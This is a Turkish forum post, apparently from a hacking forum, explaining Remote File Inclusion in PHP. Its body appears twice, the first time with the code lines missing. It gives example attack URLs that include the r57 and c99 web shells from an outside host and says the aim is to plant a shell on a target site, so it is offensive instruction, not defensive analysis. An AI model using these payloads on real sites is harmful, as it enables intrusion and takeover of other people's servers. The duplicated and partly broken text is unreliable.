RFI Açığı Nedir ?
RFI Remote File Include'nin kısaltılmışıdır. Türkçe olarak Uzaktan Dosya Çağırma anlamına gelmektedir.
RFI Açığı sadece PHP sistemlerde bulunmaktadır. Çünkü RFI açığının mantığını oluşturan kodlar PHP'de bulunmaktadır.
RFI Mantığı ?
RFI açığını bir örnek üzerince incelersek mantığını daha iyi anlıyabilirsiniz.
Örneğin bir php script yazıyoruz.
index.php dosyamıza veritabanı dosyamızı çağıralım. Bunu gerçekleştirmek için gereken kodumuz;
PHP- Kodu:
bu kodu içeren bir dosya aşağıdaki gibi işlem görür.
index.php?include=veritabanı.php
Yani include komu ile veritabanı.php dosyamızı çağırdık. İşte RFI'da mantığımız bu işlem görme şeklini kullanmaktır. Nasıl mı ?
Eğer yukarıdaki kodlama yapılırken
PHP- Kodu:
vb.. bir kod eklenmez ise yani çağrılmak istenen dosya sadece veritabanı.php ile sınırlandırlmaz ise biz istediğimiz dosyayı çağırabiliriz ve çağırdığımız tüm dosyalar php olarak işlem görür. Bir txt dosyası çağırırsak bile .php olarak işlem görür.
Örnek:
index.php?include=http://www.turkhackteam.net/path/r57.txt?
index.php?include=http://www.turkhackteam.net/path/c99.txt?
vs. şeklinde istediğimiz dosyayı çağırabiliriz.
Genel olarak biz bu açığı hedef sitemize sh3LL yedirmek etmek için kullanıyoruz.
RFI Remote File Include'nin kısaltılmışıdır. Türkçe olarak Uzaktan Dosya Çağırma anlamına gelmektedir.
RFI Açığı sadece PHP sistemlerde bulunmaktadır. Çünkü RFI açığının mantığını oluşturan kodlar PHP'de bulunmaktadır.
RFI Mantığı ?
RFI açığını bir örnek üzerince incelersek mantığını daha iyi anlıyabilirsiniz.
Örneğin bir php script yazıyoruz.
index.php dosyamıza veritabanı dosyamızı çağıralım. Bunu gerçekleştirmek için gereken kodumuz;
PHP- Kodu:
include ("veritabani.php")
bu kodu içeren bir dosya aşağıdaki gibi işlem görür.
index.php?include=veritabanı.php
Yani include komu ile veritabanı.php dosyamızı çağırdık. İşte RFI'da mantığımız bu işlem görme şeklini kullanmaktır. Nasıl mı ?
Eğer yukarıdaki kodlama yapılırken
PHP- Kodu:
$path_to_folder="./"
vb.. bir kod eklenmez ise yani çağrılmak istenen dosya sadece veritabanı.php ile sınırlandırlmaz ise biz istediğimiz dosyayı çağırabiliriz ve çağırdığımız tüm dosyalar php olarak işlem görür. Bir txt dosyası çağırırsak bile .php olarak işlem görür.
Örnek:
index.php?include=http://www.turkhackteam.net/path/r57.txt?
index.php?include=http://www.turkhackteam.net/path/c99.txt?
vs. şeklinde istediğimiz dosyayı çağırabiliriz.
Genel olarak biz bu açığı hedef sitemize sh3LL yedirmek etmek için kullanıyoruz.
Son düzenleme:
